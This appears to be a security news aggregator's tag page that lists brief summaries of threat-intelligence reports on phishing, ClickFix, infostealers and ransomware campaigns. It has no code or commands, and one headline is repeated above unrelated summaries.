Tag: SOCIAL ENGINEERING

Browser Security Under Siege: The Alarming Rise of AI-Powered Phishing
Summary: Browser security is becoming increasingly critical due to a 140% rise in phishing attacks, primarily fueled by zero-day vulnerabilities and advancements in generative AI used by cybercriminals. As attackers adopt sophisticated techniques akin to professional engineering, the risk of browser-based phishing is expected to escalate dramatically moving into 2025.…
Read More

Summary: The video discusses a wide range of security topics including the age verification dilemma, a bogus employee scheme tied to North Korea, a potential Bluetooth backdoor vulnerability discovered in popular chips, and the implications of these findings within the context of cybersecurity. Steve Gibson, the host, highlights the nature of undocumented commands found in Bluetooth chips and explains the misinterpretation of these findings as a true “backdoor.”…
Read More
SideWinder Threat Group: Maritime and Nuclear Sectors at Risk with Updated Toolset
SideWinder, also known as Rattlesnake or T-APT-04, is an advanced persistent threat group from India that has expanded its operations to target maritime and nuclear sectors across Asia, the Middle East, and Africa since 2012. Known for quickly adapting to security measures, SideWinder employs various tactics, techniques, and procedures (TTPs) to execute sophisticated cyber-attacks, primarily through phishing and malware.…
Read More
A Deep Dive into Strela Stealer and How It Targets European Countries
The Strela Stealer is a targeted infostealer malware that primarily focuses on extracting email credentials from users of Mozilla Thunderbird and Microsoft Outlook in select European countries. Delivered through phishing campaigns, it employs sophisticated social engineering techniques to trick victims into executing its payload. The malware’s infrastructure is linked to Russian hosting services, and it utilizes complex obfuscation methods to evade detection.…
Read More
GrassCall Campaign: The Hackers Behind Job Recruitment Cyber Scams
The “GrassCall” malware campaign is an advanced social engineering attack targeting job seekers in the cryptocurrency and Web3 sectors, orchestrated by the Russian cybercriminal organization “Crazy Evil.” Utilizing fake job interviews, the attackers compromise systems to steal cryptocurrency assets, resulting in hundreds of victims. Affected: cryptocurrency sector, job seekers

Keypoints :

The GrassCall malware campaign is led by the Russian-speaking cyber-criminal organization “Crazy Evil.”…
Read More
Browser Security Under Siege: The Alarming Rise of AI-Powered Phishing
Summary: As March Madness approaches, the excitement surrounding the NCAA basketball tournaments also attracts threat actors looking to exploit ticket sales and associated scams. The tournament’s emotional stakes, combined with the urgency of purchasing tickets, increase vulnerabilities, requiring heightened security measures. Collaboration and threat intelligence sharing among organizations are crucial to mitigate risks and combat sophisticated attacks targeting fans and businesses alike.…
Read More
Phishing campaign impersonates Booking dot com delivers a suite of credential stealing malware
A phishing campaign impersonating Booking.com has been identified targeting organizations within the hospitality sector, particularly in relation to travel. Using the ClickFix social engineering technique, this campaign seeks to steal credentials and engage in financial fraud, affecting various regions including North America and Europe. Affected: hospitality industry, Booking.com…
Read More
BitM Up! Session Stealing in Seconds Using the Browser-in-the-Middle Technique
The article discusses the increasing threat of Browser in the Middle (BitM) attacks which allow adversaries to compromise user sessions across various web applications swiftly. While multi-factor authentication (MFA) is critical for security, sophisticated social engineering tactics can successfully bypass it by targeting session tokens. To combat these threats, organizations are urged to implement robust defenses such as hardware-based MFA, client certificates, and FIDO2.…
Read More
Major Cyber Attacks in Review: February 2025
In February 2025, multiple significant cyber incidents revealed ongoing risks across various industries worldwide. Notable attacks included the Qilin ransomware incident at Lee Enterprises, which disrupted media distribution, and a .5 billion cryptocurrency theft attributed to North Korea’s Lazarus Group. Breaches at DISA Global Solutions, Orange, and LANIT highlighted severe vulnerabilities in finance, telecom, healthcare, media, and government sectors.…
Read More
⚡ THN Weekly Recap: Router Hacks, PyPI Attacks, New Ransomware Decryptor, and More
Summary: This week’s cybersecurity report highlights the evolving landscape of cyber threats, including advanced techniques used by threat groups and rising supply chain vulnerabilities. Law enforcement efforts against cybercriminal networks show promise, while new exploits and vulnerabilities demand prompt attention from organizations. The report includes notable incidents, emerging attack methods, and critical vulnerabilities that security teams should prioritize.…
Read More
100 Car Dealerships Hit by Supply Chain Attack
Summary: A supply chain attack compromised LES Automotive, a service used by car dealerships, enabling over 100 dealership websites to distribute malicious ClickFix code. This attack employs social engineering tactics to prompt users into executing harmful commands. The ClickFix malware campaign has increasingly targeted various sectors, including the auto and hospitality industries.…
Read More
Jaguar Land Rover Breached by HELLCAT Ransomware Group Using Its Infostealer Playbook—Then a Second Hacker Strikes
In a significant data breach, the HELLCAT ransomware group has leaked gigabytes of sensitive data from Jaguar Land Rover (JLR), exploiting compromised Jira credentials harvested from infected employees. This attack highlights the ongoing threat of infostealer malware and its capability to enable long-term exploitation of credentials.…
Read More
Malicious Adobe, DocuSign OAuth apps target Microsoft 365 accounts
Summary: Cybercriminals are using fraudulent Microsoft OAuth applications that impersonate Adobe and DocuSign to distribute malware and capture Microsoft 365 credentials. Proofpoint researchers have labeled these attacks as highly targeted and characterized them by deceptive email campaigns aimed at various industries. Users are advised to be vigilant with OAuth app requests and to verify their authenticity before granting permissions.…
Read More
Threat Actor Impersonates Booking.com in Phishing Scheme
Summary: Microsoft has reported on a new phishing technique dubbed “ClickFix,” utilized by a threat actor known as Storm-1865, which targets victims by manipulating their problem-solving tendencies to download malware. The campaign primarily targets the hospitality sector, impersonating Booking.com to deceive users into executing commands that facilitate the malware download.…
Read More
Phishing campaign impersonates Booking dot com delivers a suite of credential stealing malware
A phishing campaign identified by Microsoft Threat Intelligence targets the hospitality industry, impersonating Booking.com and utilizing the ClickFix social engineering technique to deliver credential-stealing malware. The campaign, ongoing since December 2024, aims at financial fraud by tricking users into executing malicious commands. Affected: hospitality organizations, Booking.com…
Read More
Browser Security Under Siege: The Alarming Rise of AI-Powered Phishing
Summary: Since August 2024, state-sponsored hackers and cybercriminals have been using a technique called ClickFix to deploy information stealer malware. This method involves social engineering through malicious JavaScript that manipulates users into executing harmful commands. Group-IB reports an increase in this attack vector, particularly targeting users on various platforms that offer free content or software.…
Read More
SocGholish’s Intrusion Techniques Facilitate Distribution of RansomHub Ransomware
Trend Research’s analysis of SocGholish’s MaaS framework highlights its critical role in delivering RansomHub ransomware via compromised websites. Utilizing highly obfuscated JavaScript loaders, SocGholish evades detection and successfully executes malicious tasks. Notably, the framework propels initial access for ransomware attacks, mainly affecting government entities in the United States.…
Read More
OBSCURE#BAT Malware Uses Fake CAPTCHA Pages to Deploy Rootkit r77 and Evade Detection
Summary: A new malware campaign, dubbed OBSCURE#BAT, deploys an open-source rootkit called r77 through social engineering tactics, primarily targeting English-speaking users in the US, Canada, Germany, and the UK. The campaign utilizes obfuscated Windows batch scripts and PowerShell commands to establish persistence while evading detection. Security researchers highlighted its ability to masquerade as legitimate software and employ various misleading strategies to lure victims into executing the malicious scripts.…
Read More